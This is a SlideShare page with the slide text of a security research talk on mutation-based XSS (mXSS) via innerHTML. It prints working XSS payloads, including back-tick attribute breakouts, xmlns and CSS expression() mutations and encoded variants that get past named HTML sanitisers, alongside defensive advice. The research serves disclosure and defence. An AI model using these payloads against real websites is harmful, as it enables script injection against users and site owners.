SlideShare a Scribd company logo

The innerHTML Apocalypse

Mario Heiderich
Mario Heiderich

This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.

EducationTechnology
1 of 51
Download to read offline
The innerHTML Apocalypse How mXSS attacks change everything we believed to know so far A presentation by Mario Heiderich mario@cure53.de || @0x6D6172696F
Our Fellow Messenger ● Dr.-Ing. Mario Heiderich ● Researcher and Post-Doc, Ruhr-Uni Bochum – PhD Thesis on Client Side Security and Defense ● Founder of Cure53 – Penetration Testing Firm – Consulting, Workshops, Trainings – Simply the Best Company of the World ● Published author and international speaker – Specialized in HTML5 and SVG Security – JavaScript, XSS and Client Side Attacks ● HTML5 Security Cheatsheet – @0x6D6172696F – mario@cure53.de
Research Focus ● Everything inside <> ● HTML 2.0 – 5.1 ● JavaScript / JScript, VBS ● Plug-ins and Controls ● Editable Rich-Text ● SVG, MathML, XLS, XDR ● CSS, Scriptless Attacks ● ES5 / ES6 ● DOM Clobbering ● No binary stuff. My brain cannot :) ● Offense ● Injection Scenarios ● Active File formats ● Parser Analysis ● Archeology & Legacy Porn ● Defense ● XSS Filter / WAF / IDS ● CSP, DOM-based XSS Filter ● DOM Policies ● DOM + Trust & Control
Why? ● HTML on its way to ultimate power ● Websites and Applications ● Instant Messengers and Email Clients ● Local documentation and presentations ● Router Interfaces and coffee-machine UIs ● Medical Devices – according to this source ● Operating systems, Win8, Tizen ● HTML + DOM + JavaScript ● “I mean look at friggin' Gmail!” ● I measured the amount of JavaScript on 27th of Jan. 2013 ● It was exactly 3582,8 Kilobytes of text/javascript
Defense ● Several layers of defense over the years ● Network-based defense, IDS/IPS, WAF ● Server-side defense, mod_security, others ● Client-side defense, XSS Filter, CSP, NoScript ● “We bypassed, they fixed.” ● A lot of documentation, sometimes good ones too! ● Hundreds of papers, talks, blog posts ● Those three horsemen are covered quite well!
Horsemen? ● Reflected XSS ● The White Horse – “Purity”. Easy to understand, detect and prevent. ● Stored XSS ● The Red Horse – “War”. Harder to detect and prevent – where rich-text of benign nature is needed. ● DOMXSS ● The Black Horse – “Disease”. Harder to comprehend. Often complex, hard to detect and prevent.
“But what's a proper apocalypse without...”
“And there before me was a pale horse! Its rider was named Death, and Hades  was following close behind him. They were given power over a fourth of the earth  to kill by sword, famine and plague, and by the wild beasts of the earth.”     Revelation 6:8
“Enough with the kitsch, let's get technical”
Assumptions ● Reflected XSS comes via URL / Parameters ● We can filter input properly ● Persistent XSS comes via POST / FILE ● We can filter output properly ● Tell good HTML apart from bad ● DOMXSS comes from DOM properties ● No unfiltered usage of DOMXSS sources ● We can be more careful with DOMXSS sinks ● We can create safer JavaScript business logic ● Following those rules + handling Uploads properly + setting some headers mitigates XSS. Right?
That telling apart... ● Advanced filter libraries ● OWASP Antisamy / XSS Filter Project ● HTML Purifier ● SafeHTML ● jSoup ● Many others out there ● Used in Webmailers, CMS, Social Networks ● Intranet, Extranet, WWW, Messenger-Tools, Mail-Clients ● They are the major gateway between ● Fancy User-generated Rich-Text ● And a persistent XSS ● Those things work VERY well! ● Without them working well, shit would break
“But what if we can fool those tools? Just ship around them. Every single one of them?”
Convenience
Decades Ago... ● MS added a convenient DOM property ● It was available in Internet Explorer 4 ● Allowed to manipulate the DOM... ● … without even manipulating it... ● … but have the browser do the work! ● element.innerHTML ● Direct access to the elements HTML content ● Read and write of course ● Browser does all the nasty DOM stuff internally
Look at this // The DOM way var myId = "spanID"; var myDiv = document.getElementById("myDivId"); var mySpan = document.createElement('span'); var spanContent = document.createTextNode('Bla'); mySpan.id = mySpanId; mySpan.appendChild(spanContent); myDiv.appendChild(mySpan); // The innerHTML way var myId = "spanID"; var myDiv = document.getElementById("myDivId"); myDiv.innerHTML = '<span id="'+myId+'">Bla</span>';
Compared ● Pro ● It's easy ● It's fast ● It's now a standard ● It just works ● It's got a big brother.. outerHTML ● Contra ● Bit bitchy with tables ● Slow on older browsers ● No XML ● Not as “true” as real DOM manipulation
Who uses it?
Rich Text Editors ● The basically exist because of innerHTML ● And of course contentEditable ● And they are everywhere ● CMS ● Webmailers ● Email Clients ● Publishing Tools
“Now, what's the problem with all this?”
Internals ● We might be naïve and assume: ● ƒ(ƒ(x)) ≡ ƒ(x) ● Idempotency ● An elements innerHTML matches it's actual content ● But it doesn't ● It's non-idempotent and changes! ● And that's usually even very good! ● Performance ● Bad markup that messes up structure ● Illegal markup in a sane DOM tree
Examples ● We have a little test-suite for you ● Let's see some examples ● And why non-idempotency is actually good IN: <div>123 OUT: <div>123</div> IN: <Div/class=abc>123 OUT: <div class="abc">123</div> IN: <span><dIV>123</span> OUT: <span><div>123</div></span>
Funny Stuff ● So browsers change the markup ● Sanitize, beautify, optimize ● There's nothing we can do about it ● And it often helps ● Some funny artifacts exist... ● Comments for instance ● Or try CDATA sections for a change... IN: <!-> OUT: <!-----> IN: <!--> OUT: <!----> IN: <![CDATA]> OUT: <!--[CDATA]-->
“And what does it have to do with security again?”
It was back in 2006... ● .. when a fellow desk-worker noticed a strange thing. Magical, even!
The Broken Preview ● Sometimes print preview was bricked ● Attribute content bled into the document ● No obvious reason... ● Then Yosuke Hasegawa analyzed the problem ● One year later in 2007 ● And discovered the first pointer to mXSS
Now let's have a look ● DEMO ● Requires IE8 or older
IN: <img src="foo" alt="``onerror=alert(1)" /> OUT: <IMG alt=``onerror=alert(1) src="x">
Pretty bad ● But not new ● Still, works like a charm! ● Update: A patch is on the way! ● Update II: Patch is out! ● But not new ● Did you like it though? ● Because we have “new” :)
Unknown Elements ● Again, we open our test suite ● Requires IE9 or older ● Two variations – one of which is new ● The other discovered by LeverOne
IN: <article xmlns="><img src=x onerror=alert(1)"></article> OUT: <?XML:NAMESPACE PREFIX = [default] ><img src=x onerror=alert(1) NS = "><img src=x onerror=alert(1)" /><article xmlns="><img src=x onerror=alert(1)"></article>
IN: <article xmlns="x:img src=x onerror=alert(1) "> OUT: <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1) "></img src=x onerror=alert(1) :article>
Not Entirely Bad ● Few websites allow xmlns ● Everybody allows (or will allow) <article> though ● Harmless HTML5 ● Alas it's a HTML4 browser – as is IE in older document modes ● Wait, what are those again? ● <meta http-equiv="X-UA-Compatible" content="IE=IE5" /> ● Force the browser to fall-back to an old mode ● Old features, old layout bugs... ● And more stuff to do with mutations
“Now for some real bad things!”
Style Attributes ● Everybody loves them ● It's just CSS, right? ● XSS filters tolerate them ● But watch their content closely! ● No CSS expressions ● No behaviors (HTC) or “scriptlets” (SCT) ● Not even absolute positioning... ● ...or negative margins, bloaty borders
Let's have a look ● And use our test suite again ● All IE versions, older Firefox
IN: <p style="font-family:'223bx:expression(alert(1))/*'"> OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
“And there's so many variations!” And those are just for you, fellow conference attendees, they are not gonna be on the slides So enjoy!
HTML Entities ● Chrome messed up with <textarea> ● Found and reported by Eduardo ● Firefox screwed up with SVG <svg><style>&ltimg src=x onerror=alert(1)&gt</svg> ● IE has problems with <listing> ● <listing>&ltimg src=x onerror=alert(1)&gt</listing> ● Let's have another look again and demo... ● Also...text/xhtml! ● All CDATA will be decoded! ● That's also why inline SVG and MathML add more fun
Who is affected? ● Most existing HTML filters and sanitizers ● Thus the software they aim to protect ● HTML Purifier, funny, right? ● JSoup, AntiSamy, HTMLawed, you name it! ● Google Caja (not anymore since very recently) ● All tested Rich-Text Editors ● Most existing Web-Mailers ● This includes the big ones ● As well as open source tools and libraries ● Basically anything that obeys standards... ● .. and doesn't know about the problem
Wait... it's encoded! <p style="font-family:'foo&amp;#x5c;27&am p;#x5c;3bx:expr&amp;#x65;ession(alert( 1))'"> Yep. Encoded. But does it matter?
Wait... it's encoded! <p style="font-family:'foo&amp;#x5c;27&am p;#x5c;3bx:expr&amp;#x65;ession(alert( 1))'"> Yep. Encoded. But does it matter? NO! mXSS mutations work recursively! Just access innerHTML twice! For your health!
How to Protect? ● Fancy Websites ● Enforce standards mode ● Avoid getting framed, use XFO ● <!doctype html> ● Use CSP ● Motivate users to upgrade browsers ● Avoid SVG and MathML ● Actual Websites ● Patch your filter! ● Employ strict white-lists ● Avoid critical characters in HTML attribute values ● Be extremely paranoid about user-generated CSS ● Don't obey to standards ● Know the vulnerabilities And for Pentesters? Inject style attributes + backslash or ampersand and you have already won. Nothing goes? Use the back-tick trick.
Alternatives ● mXSS Attacks rely on mutations ● Those we can mitigate in the DOM ● Behold... TrueHTML ● Here's a small demo ● We intercept any innerHTML access ● And serialize the markup... XML-style ● Mitigates a large quantity of attack vectors ● Not all though ● Know thy CDATA sections ● Avoid SVG whenever possible ● Inline-SVG is the devil :) And MathML isn't much better...
Takeaway? ● So, what was in it for you? ● Pentester: New wildcard-bug pattern ● Developer: Infos to protect your app ● Browser: Pointer to a problem-zone to watch ● Specifier: Some hints for upcoming specs
Wrapping it up ● Today we saw ● Some HTML, DOM and browser history ● Some old yet unknown attacks revisited ● Some very fresh attacks ● A “pentest joker” ● Some guidelines on how to defend ● The W3C's silver bullet. For 2015 maybe.
The End ● Questions? ● Comments? ● Can I have a drink now? ● Credits to ● Gareth Heyes, Yosuke Hasegawa, LeverOne, ● Eduardo Vela, Dave Ross, Stefano Di Paola

Recommended

Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Christian Schneider
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 

Recommended

Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Christian Schneider
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
 
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksJSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks
JSMVCOMFG - To sternly look at JavaScript MVC and Templating FrameworksMario Heiderich
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
The Rust Programming Language: an Overview
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an OverviewRoberto Casadei
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Introduction to Go programming language
Introduction to Go programming languageIntroduction to Go programming language
Introduction to Go programming languageSlawomir Dorzak
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaCODE BLUE
 
Atomicity In Redis: Thomas Hunter
Atomicity In Redis: Thomas HunterAtomicity In Redis: Thomas Hunter
Atomicity In Redis: Thomas HunterRedis Labs
 
Rust Programming Language
Rust Programming LanguageRust Programming Language
Rust Programming LanguageJaeju Kim
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Rust system programming language
Rust system programming languageRust system programming language
Rust system programming languagerobin_sy
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 

More Related Content

What's hot

AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
The Rust Programming Language: an Overview
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an OverviewRoberto Casadei
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Introduction to Go programming language
Introduction to Go programming languageIntroduction to Go programming language
Introduction to Go programming languageSlawomir Dorzak
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaCODE BLUE
 
Atomicity In Redis: Thomas Hunter
Atomicity In Redis: Thomas HunterAtomicity In Redis: Thomas Hunter
Atomicity In Redis: Thomas HunterRedis Labs
 
Rust Programming Language
Rust Programming LanguageRust Programming Language
Rust Programming LanguageJaeju Kim
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Rust system programming language
Rust system programming languageRust system programming language
Rust system programming languagerobin_sy
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 

What's hot (20)

AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
The Rust Programming Language: an Overview
The Rust Programming Language: an OverviewThe Rust Programming Language: an Overview
The Rust Programming Language: an Overview
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Introduction to Go programming language
Introduction to Go programming languageIntroduction to Go programming language
Introduction to Go programming language
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
 
Atomicity In Redis: Thomas Hunter
Atomicity In Redis: Thomas HunterAtomicity In Redis: Thomas Hunter
Atomicity In Redis: Thomas Hunter
 
Rust Programming Language
Rust Programming LanguageRust Programming Language
Rust Programming Language
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Rust system programming language
Rust system programming languageRust system programming language
Rust system programming language
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 

Viewers also liked

Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
 
Web 2016 (13/13) Securitatea aplicațiilor Web
Web 2016 (13/13) Securitatea aplicațiilor WebWeb 2016 (13/13) Securitatea aplicațiilor Web
Web 2016 (13/13) Securitatea aplicațiilor WebSabin Buraga
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
 
Native Cross-Platform-Apps mit Titanium Mobile und Alloy
Native Cross-Platform-Apps mit Titanium Mobile und AlloyNative Cross-Platform-Apps mit Titanium Mobile und Alloy
Native Cross-Platform-Apps mit Titanium Mobile und AlloyMayflower GmbH
 
Vom Entwickler zur Führungskraft
Vom Entwickler zur FührungskraftVom Entwickler zur Führungskraft
Vom Entwickler zur FührungskraftMayflower GmbH
 
Image handling in Android
Image handling in AndroidImage handling in Android
Image handling in AndroidTyrone Nicholas
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
 
Chrome Devtools for beginners (v1.1)
Chrome Devtools for beginners (v1.1)Chrome Devtools for beginners (v1.1)
Chrome Devtools for beginners (v1.1)yoshikawa_t
 
JavaScript Days 2015: Security
JavaScript Days 2015: SecurityJavaScript Days 2015: Security
JavaScript Days 2015: SecurityMayflower GmbH
 
Pair Programming Mythbusters
Pair Programming MythbustersPair Programming Mythbusters
Pair Programming MythbustersMayflower GmbH
 
Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...
Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...
Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...Mayflower GmbH
 
困った時のDev toolsの使い方(初心者向け)
困った時のDev toolsの使い方(初心者向け)困った時のDev toolsの使い方(初心者向け)
困った時のDev toolsの使い方(初心者向け)yoshikawa_t
 
Melania caraconcea lucrare de disertatie
Melania caraconcea lucrare de disertatieMelania caraconcea lucrare de disertatie
Melania caraconcea lucrare de disertatieGeta Soca
 
Creativitate si inventica [pdf]
Creativitate si inventica [pdf]Creativitate si inventica [pdf]
Creativitate si inventica [pdf]escobar94
 
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript APIHTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript APIYosuke HASEGAWA
 

Viewers also liked (20)

Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
 
Web 2016 (13/13) Securitatea aplicațiilor Web
Web 2016 (13/13) Securitatea aplicațiilor WebWeb 2016 (13/13) Securitatea aplicațiilor Web
Web 2016 (13/13) Securitatea aplicațiilor Web
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carol
 
Responsive Webdesign
Responsive WebdesignResponsive Webdesign
Responsive Webdesign
 
Native Cross-Platform-Apps mit Titanium Mobile und Alloy
Native Cross-Platform-Apps mit Titanium Mobile und AlloyNative Cross-Platform-Apps mit Titanium Mobile und Alloy
Native Cross-Platform-Apps mit Titanium Mobile und Alloy
 
Usability im web
Usability im webUsability im web
Usability im web
 
Vom Entwickler zur Führungskraft
Vom Entwickler zur FührungskraftVom Entwickler zur Führungskraft
Vom Entwickler zur Führungskraft
 
Image handling in Android
Image handling in AndroidImage handling in Android
Image handling in Android
 
Is my app secure?
Is my app secure?Is my app secure?
Is my app secure?
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
 
Chrome Devtools for beginners (v1.1)
Chrome Devtools for beginners (v1.1)Chrome Devtools for beginners (v1.1)
